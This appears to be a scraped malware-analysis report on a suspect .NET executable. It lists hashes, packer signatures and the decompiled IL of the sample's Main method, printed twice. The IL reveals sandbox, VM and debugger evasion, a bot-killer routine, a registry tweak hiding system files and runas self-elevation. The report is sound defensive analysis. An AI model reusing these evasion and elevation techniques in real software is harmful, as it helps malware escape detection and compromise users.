Suspicious
Suspect

fd8c3380af01e1ed70f4a7ce76b27eb8

PE Executable
|
MD5: fd8c3380af01e1ed70f4a7ce76b27eb8
|
Size: 28.77 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very low

Hash
 Hash Value
MD5
fd8c3380af01e1ed70f4a7ce76b27eb8
Sha1
82461a16e8862fc94d89ad3ce816b0f70c000801
Sha256
2390425e802f528531bd72d05ffbd96a8205955887aa91ceac334fd995540cb6
Sha384
e775ef6f5434bf6357c304edc8389c0fa08ff51ecb78dd36915be3827ccebcbb9c124dbd841505af9aaf06d1b446ed83
Sha512
36afdb0f477b6ccdbbc7e3b399dcaca671fa86dbe477f7f4613d38c23565e568fd46de9b300d5683ceb03015cccce209b6f9d6e893be2295a67ba63bdbdee66c
SSDeep
393216:xwehPyoD3R76vcMEvWV3XRXD1EeEBcYUsXm7HOjrWBhihFAeVmcHGx/YhXTs:uehaMAv3EvOXqKyfWBhiS6G4T
TLSH
0357332DD68C388CDEE7DC332434C91220BA9EBC8A9B5750751B2A14ED046F69BF5367

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
fd8c3380af01e1ed70f4a7ce76b27eb8
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
tlqnsetveso.Resources
4197CA333455.exe
dddd.exe
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

342.exe
Full Name

342.exe
EntryPoint

System.Void Program::Main()
Scope Name

342.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

342
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

36
Main Method

System.Void Program::Main()
Main IL Instruction Count

84
Main IL

ldc.i4 2000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Boolean Program::CreateMutex() brtrue.s IL_001B: call System.Boolean Program::DetectVirtualMachine() call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) call System.Boolean Program::DetectVirtualMachine() call System.Boolean Program::Emulator() or <null> call System.Boolean Program::DetectDebugger() or <null> call System.Boolean Program::DetectSandboxie() or <null> call System.Boolean Program::anyrun() or <null> brfalse.s IL_0040: leave.s IL_0050 ldnull <null> call System.Void System.Environment::FailFast(System.String) leave.s IL_0050: call System.Void Program::RunBotKiller() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.0 <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0050: call System.Void Program::RunBotKiller() call System.Void Program::RunBotKiller() call My.MyComputer My.MyProject::get_Computer() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.1 <null> ldloc.1 <null> ldstr ShowSuperHidden callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) ldc.i4.1 <null> box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) brfalse.s IL_009A: leave.s IL_00AA ldloc.1 <null> ldstr ShowSuperHidden ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_00AA: call System.Boolean Program::AdminCheck() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.2 <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00AA: call System.Boolean Program::AdminCheck() call System.Boolean Program::AdminCheck() brtrue.s IL_010C: ldnull newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.3 <null> ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.3 <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) ldloc.3 <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) leave.s IL_010A: br.s IL_0113 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_010A: br.s IL_0113 br.s IL_0113: ret ldnull <null> call System.Object Program::WorkF(System.Object) pop <null> ret <null>
Module Name

342.exe
Full Name

342.exe
EntryPoint

System.Void Program::Main()
Scope Name

342.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

342
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

36
Main Method

System.Void Program::Main()
Main IL Instruction Count

84
Main IL

ldc.i4 2000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Boolean Program::CreateMutex() brtrue.s IL_001B: call System.Boolean Program::DetectVirtualMachine() call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) call System.Boolean Program::DetectVirtualMachine() call System.Boolean Program::Emulator() or <null> call System.Boolean Program::DetectDebugger() or <null> call System.Boolean Program::DetectSandboxie() or <null> call System.Boolean Program::anyrun() or <null> brfalse.s IL_0040: leave.s IL_0050 ldnull <null> call System.Void System.Environment::FailFast(System.String) leave.s IL_0050: call System.Void Program::RunBotKiller() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.0 <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0050: call System.Void Program::RunBotKiller() call System.Void Program::RunBotKiller() call My.MyComputer My.MyProject::get_Computer() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.1 <null> ldloc.1 <null> ldstr ShowSuperHidden callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) ldc.i4.1 <null> box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) brfalse.s IL_009A: leave.s IL_00AA ldloc.1 <null> ldstr ShowSuperHidden ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_00AA: call System.Boolean Program::AdminCheck() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.2 <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00AA: call System.Boolean Program::AdminCheck() call System.Boolean Program::AdminCheck() brtrue.s IL_010C: ldnull newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.3 <null> ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.3 <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) ldloc.3 <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) leave.s IL_010A: br.s IL_0113 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Int32 System.Environment::get_ExitCode() call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_010A: br.s IL_0113 br.s IL_0113: ret ldnull <null> call System.Object Program::WorkF(System.Object) pop <null> ret <null>
fd8c3380af01e1ed70f4a7ce76b27eb8 (28.77 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙